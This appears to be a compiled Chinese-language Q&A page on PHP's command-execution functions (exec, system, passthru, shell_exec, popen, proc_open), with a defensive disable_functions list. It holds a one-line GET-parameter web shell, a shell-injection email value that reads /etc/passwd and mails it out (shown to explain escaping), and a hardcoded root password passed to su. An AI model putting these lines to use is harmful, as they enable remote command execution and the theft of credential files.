phppassthru
1. <{passthru($_GET["cmd"])}>好像不是合法的php語法吧
<?php echo {passthru($_GET["cmd"])}?>
2. 一些需要禁用的PHP危險函數(disable_functions)
phpinfo()
功能描述:輸出
PHP
環境信息以及相關的模塊、WEB
環境等信息。
危險等級:中
passthru()
功能描述:允許執行一個外部程序並回顯輸出,類似於
exec()。
危險等級:高
exec()
功能描述:允許執行一個外部程序(如
UNIX
Shell
或
CMD
命令等)。
危險等級:高
system()
功能描述:允許執行一個外部程序並回顯輸出,類似於
passthru()。
危險等級:高
chroot()
功能描述:可改變當前
PHP
進程的工作根目錄,僅當系統支持
CLI
模式
PHP
時才能工作,且該函數不適用於
Windows
系統。
危險等級:高
scandir()
功能描述:列出指定路徑中的文件和目錄。
危險等級:中
chgrp()
功能描述:改變文件或目錄所屬的用戶組。
危險等級:高
chown()
功能描述:改變文件或目錄的所有者。
危險等級:高
shell_exec()
功能描述:通過
Shell
執行命令,並將執行結果作為字元串返回。
危險等級:高
proc_open()
功能描述:執行一個命令並打開文件指針用於讀取以及寫入。
危險等級:高
proc_get_status()
功能描述:獲取使用
proc_open()
所打開進程的信息。
危險等級:高
error_log()
功能描述:將錯誤信息發送到指定位置(文件)。
安全備註:在某些版本的
PHP
中,可使用
error_log()
繞過
PHP
safe
mode,
執行任意命令。
危險等級:低
ini_alter()
功能描述:是
ini_set()
函數的一個別名函數,功能與
ini_set()
相同。
具體參見
ini_set()。
危險等級:高
ini_set()
功能描述:可用於修改、設置
PHP
環境配置參數。
危險等級:高
ini_restore()
功能描述:可用於恢復
PHP
環境配置參數到其初始值。
危險等級:高
dl()
功能描述:在
PHP
進行運行過程當中(而非啟動時)載入一個
PHP
外部模塊。
危險等級:高
pfsockopen()
功能描述:建立一個
Internet
或
UNIX
域的
socket
持久連接。
危險等級:高
syslog()
功能描述:可調用
UNIX
系統的系統層
syslog()
函數。
危險等級:中
readlink()
功能描述:返回符號連接指向的目標文件內容。
危險等級:中
symlink()
功能描述:在
UNIX
系統中建立一個符號鏈接。
危險等級:高
popen()
功能描述:可通過
popen()
的參數傳遞一條命令,並對
popen()
所打開的文件進行執行。
危險等級:高
stream_socket_server()
功能描述:建立一個
Internet
或
UNIX
伺服器連接。
危險等級:中
putenv()
功能描述:用於在
PHP
運行時改變系統字元集環境。在低於
5.2.6
版本的
PHP
中,可利用該函數
修改系統字元集環境後,利用
sendmail
指令發送特殊參數執行系統
SHELL
命令。
危險等級:高
禁用方法如下:
打開/etc/php.ini文件,
查找到
disable_functions
,添加需禁用的函數名,如下:
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
3. php執行函數
PHP提供4個專門的執行外部命令的函數:exec(), system(), passthru(), shell_exec()
1)exec()
原型: string exec ( string $command [, array &$output [, int &$return_var ]] )
說明: exec執行系統外部命令時不會輸出結果,而是返回結果的最後一行。如果想得到結果,可以使用第二個參數,讓其輸出到指定的數組。此數組一個記錄代表輸出的一行。即如果輸出結果有20行,則這個數組就有20條記錄,所以如果需要反復輸出調用不同系統外部命令的結果,最好在輸出每一條系統外部命令結果時清空這個數組unset($output),以防混亂。第三個參數用來取得命令執行的狀態碼,通常執行成功都是返回0。
<?php
exec("dir",$output);
print_r($output);
?>
2)system()
原型: string system ( string $command [, int &$return_var ] )
說明: system和exec的區別在於,system在執行系統外部命令時,直接將結果輸出到游覽器,如果執行命令成功則返回true,否則返回false。第二個參數與exec第三個參數含義一樣。
<?php
system("pwd");
?>
3)passthru()
原型: void passthru ( string $command [, int &$return_var ] )
說明: passthru與system的區別,passthru直接將結果輸出到游覽器,不返回任何值,且其可以輸出二進制,比如圖像數據。第二個參數可選,是狀態碼。
<?php
header("Content-type:image/gif");
passthru("/usr/bin/ppm2tiff /usr/share/tk8.4/demos/images/teapot.ppm");
?>
4)shell_exec()
原型: string shell_exec(string $cmd)
說明: 直接執行命令$cmd
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>
防超時的處理方法:
當執行命令的返回結果非常龐大時,可以需要考慮將返回結果輸出至其他文件,再另行讀取文件,這樣可以顯著提高程序執行的效率。
如果要執行的命令要花費很長的時間,那麼應該把這個命令放到系統的後台去運行。但在默認情況下,
象system()等函數要等到這個命令運行完才返回(實際上是在等命令的輸出結果),
這肯定會引起PHP腳本的超時。解決的辦法是把命令的輸出重定向到另外一個文件或流中,如:
<?php
system("/usr/local/bin/order_proc > /tmp/abc ");
?>
<?
$filename=time().".data";
exec("/app/gm/gm_center/test/hello.py > $filename",$output);
var_mp ($output);
?>
4. 我在雲伺服器上(linux系統)想用php代碼調用一個exe程序,passthru("$data",$result),卻總是返回126.
這是不可以的
php 的 exec、system等函數都是在後台運行的,不可能出現窗口界面
另外php是在伺服器上運行的,雖然你是在一台機器上調試,但也應該把它看做是兩台機器
即便用exec能夠出現窗口,你也不可能跑到伺服器上去操作。
5. linux php函數有哪些
PHP調用Linux系統的常用函數
1、exec函數
<?php
$test = "ls /tmp/test"; //ls是linux下的查目錄,文件的命令
exec($test,$array); //執行命令
print_r($array);
?>
2、system函數
<?php
$test = "ls /tmp/test";
$last = system($test);
print "last: $last\n";
?>
3、passthru函數
<?php
$test = "ls /tmp/test";
passthru($test);
?>
4、popen函數
<?php
$test = "ls /tmp/test";
$fp = popen($test,"r"); //popen打一個進程通道
while (!feof($fp)) { //從通道裡面取得東西
$out = fgets($fp, 4096);
echo $out; //列印出來
}
pclose($fp);
?>
5、proc_open函數
<?php
$test = "ls /tmp/test";
$arrayarray = array(
array("pipe","r"), //標准輸入
array("pipe","w"), //標准輸出內容
array("pipe","w") //標准輸出錯誤
);
$fp = proc_open($test,$array,$pipes); //打開一個進程通道
echo stream_get_contents($pipes[1]); //為什麼是$pipes[1],因為1是輸出內容
proc_close($fp);
?>
6、proc_open函數
<?php
$test = "ls /tmp/test";
$arrayarray = array(
array("pipe","r"), //標准輸入
array("pipe","w"), //標准輸出內容
array("pipe","w") //標准輸出錯誤
);
$fp = proc_open($test,$array,$pipes); //打開一個進程通道
echo stream_get_contents($pipes[1]); //為什麼是$pipes[1],因為1是輸出內容
proc_close($fp);
?>
7、shell_exec函數
<?php
$test = "ls /tmp/test";
$out = shell_exec($test);
echo $out;
?>
6. 如何讓php執行shell
php給我們提供了system(),exec(),passthru()這三個函數來調用外部的命令.
雖然這三個命令都能執行linux系統的shell命令,但是其實他們是有區別的:
system() 輸出並返回最後一行shell結果。
exec() 不輸出結果,返回最後一行shell結果,所有結果可以保存到一個返回的數組裡面。
passthru() 只調用命令,把命令的運行結果原樣地直接輸出到標准輸出設備上。
相同點:都可以獲得命令執行的狀態碼
例子:system("/usr/local/bin/webalizer/webalizer");
7. 在php命令行業中怎樣列印內容
在PHP中調用外部命令,可以用如下三種方法來實現:
1) 用PHP提供的專門函數
PHP提供共了3個專門的執行外部命令的函數:system(),exec(),passthru()。
system()
原型:string
system (string command [, int return_var])
system()函數很其它語言中的差不多,它執行給定的命令,輸出和返回結果。第二個參數是可選的,用來得到命令執行後的狀態碼。
例子:
復制代碼
代碼如下:
<?php
system("/usr/local/bin/webalizer/webalizer");
?>
exec()
原型:string exec (string command [, string array [, int return_var]])
exec
()函數與system()類似,也執行給定的命令,但不輸出結果,而是返回結果的最後一行。雖然它只返回命令結果的最後一行,但用第二個參數array
可以得到完整的結果,方法是把結果逐行追加到array的結尾處。所以如果array不是空的,在調用之前最好用unset()最它清掉。只有指定了第二
個參數時,才可以用第三個參數,用來取得命令執行的狀態碼。
例子:
復制代碼
代碼如下:
<?php
exec("/bin/ls -l");
exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);
?>
passthru()
原型:void passthru (string command [, int
return_var])
passthru
()只調用命令,不返回任何結果,但把命令的運行結果原樣地直接輸出到標准輸出設備上。所以passthru()函數經常用來調用象pbmplus
(Unix下的一個處理圖片的工具,輸出二進制的原始圖片的流)這樣的程序。同樣它也可以得到命令執行的狀態碼。
例子:
復制代碼
代碼如下:
<?php
header("Content-type:
image/gif");
passthru("./ppmtogif hunte.ppm");
?>
2)
用popen()函數打開進程
上面的方法只能簡單地執行命令,卻不能與命令交互。但有些時候必須向命令輸入一些東西,如在增加Linux的系統用戶時,要調用su來把當前用戶換到root才行,而su命令必須要在命令行上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。
popen
()函數打開一個進程管道來執行給定的命令,返回一個文件句柄。既然返回的是一個文件句柄,那麼就可以對它讀和寫了。在PHP3中,對這種句柄只能做單一
的操作模式,要麼寫,要麼讀;從PHP4開始,可以同時讀和寫了。除非這個句柄是以一種模式(讀或寫)打開的,否則必須調用pclose()函數來關閉 它。
例子1:
復制代碼
代碼如下:
<?php
$fp=popen("/bin/ls -l", "r");
?>
例子2:
復制代碼
代碼如下:
<?php
/* PHP中如何增加一個系統用戶
下面是一段常式,增加一個名字為james的用戶,
root密碼是 verygood。僅供參考
*/
$sucommand =
"su --login root --command";
$useradd = "useradd ";
$rootpasswd =
"verygood";
$user = "james";
$user_add = sprintf("%s "%s
%s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
3)
用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)
這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇號把要執行的命令括起來作為一個表達式,這個表達式的值就是命令執行的結果。如:
復制代碼
代碼如下:
<?php
$res='/bin/ls -l';
echo '
'.$res.'
';
?>
這個腳本的輸出就象:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考慮些什麼看
要考慮兩個問題:安全性和超時。
先
看安全性。比如,你有一家小型的網上商店,所以可以出售的產品列表放在一個文件中。你編寫了一個有表單的HTML文件,讓你的用戶輸入他們的EMAIL地
址,然後把這個產品列表發給他們。假設你沒有使用PHP的mail()函數(或者從未聽說過),你就調用Linux/Unix系統的mail程序來發送這
個文件。程序就象這樣:
復制代碼
代碼如下:
<?php
system("mail $to <
procts.txt");
echo "我們的產品目錄已經發送到你的信箱:$to";
?>
用這段代碼,一般的用戶不會產生什麼危險,但實際上存在著非常大的安全漏洞。如果有個惡意的用戶輸入了這樣一個EMAIL地址:
'--bla ; mail [email protected] < /etc/passwd ;'
那麼這條命令最終變成:
'mail --bla ; mail [email protected] < /etc/passwd ; < procts.txt'
我相信,無論哪個網路管理人員見到這樣的命令,都會嚇出一身冷汗來。
幸
好,PHP為我們提供了兩個函數:EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字元串
中所有可能瞞過Shell而去執行另外一個命令的字元轉義。這些字元在Shell中是有特殊含義的,象分號(),重定向(>)和從文件讀入
(<)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字元串兩邊加上單引號,並把字元串中的單引號轉義,這樣這個字元串
就可以安全地作為命令的參數。
再來看看超時問題。如果要執行的命令要花費很長的時間,那麼應該把這個命令放到系統的後台去運
行。但在默認情況下,象system()等函數要等到這個命令運行完才返回(實際上是要等命令的輸出結果),這肯定會引起PHP腳本的超時。解決的辦法是
把命令的輸出重定向到另外一個文件或流中,如:
復制代碼
代碼如下:
<?php
system("/usr/local/bin/order_proc > /tmp/null &");
?>
8. linux下,php啟用exec(),system(),passthru(),這幾個函數失敗,返回值是1、127、126
是不是函數未定義,這幾個函數模塊沒有開啟,所以不支持,找到模塊函數將注釋去掉,重啟apache試試
9. 怎麼用php命令執行php代碼
PHP執行命令的四種方法
方法一:使用exec函數執行系統外部命令
原型:function exec(string $command,array[optional] $output,int[optional]
$return_value)
<?
exec("dir",$outPut);
print_r($outPut);
?>
說明:列出和PHP執行文件同級目錄下的所有目錄及文件信息。
知識點:exec執行系統外部命令時不會輸出結果,而是返回結果的最後一行,如果你想得到結果你可以使用第二個參數,讓其輸出到指定的數組,此數組一個記錄代表輸出的一行,即如果輸出結果有20行,則這個數組就有20條記錄,所以如果你需要反復輸出調用不同系統外部命令的結果,你最好在輸出每一條系統外部命令結果時清空這個數組,以防混亂。第三個參數用來取得命令執行的狀態碼,通常執行成功都是返回0。
方法二:使用system函數執行系統外部命令
原型:function system(string $command,int[optional] $return_value)
1
2
3
<?
system("dir");
?>
知識點:system和exec的區別在於system在執行系統外部命令時,直接將結果輸出到游覽器,如果執行命令成功則返回true,否則返回false。第二個參數與exec第三個參數含義一樣。
方法三:使用函數passthru執行系統外部命令
原型:function passthru(string $command,int[optional] $return_value)
知識點:passthru與system的區別,passthru直接將結果輸出到游覽器,不返回任何值,且其可以輸出二進制,比如圖像數據。
方法四:反撇號`(和~在同一個鍵)執行系統外部命令
1
2
3
<?
echo `dir`;
?>
知識點:在使用這種方法執行系統外部命令時,你要確保shell_exec函數可用,否則是無法使用這種反撇號執行系統外部命令的。
